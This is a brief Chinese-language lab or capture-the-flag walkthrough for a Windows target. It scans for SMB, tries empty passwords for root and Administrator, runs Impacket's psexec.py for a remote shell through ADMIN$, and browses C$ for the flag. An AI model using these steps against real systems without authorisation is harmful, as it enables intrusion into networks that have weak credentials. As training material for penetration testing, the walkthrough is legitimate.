Tactits
1. nmap扫描,发现SMB服务
2. 尝试空密码
root
Administrator
利用方法1:ADMIN$的利用:Impacket框架中的psexec.py
Impacket包含数十种与Windows交互的工具,适合攻击Windows和AD,其中最常见的是psexec.py。
psexec.py与微软的Sysinternals套件中的PsExec执行相同功能,使用任意用户凭证运行进程,能在远程Windows上执行交互式shell
先下载Impacket框架
git clone https://github.com/SecureAuthCorp/impacket.git
安装
python setup.py install
装pip包
pip install -r requirements.txt
利用方法
psexec.py username@ip
拿到Windows的shell
利用方法2:C$的利用,直接查找下载flag
下载到本机
查看
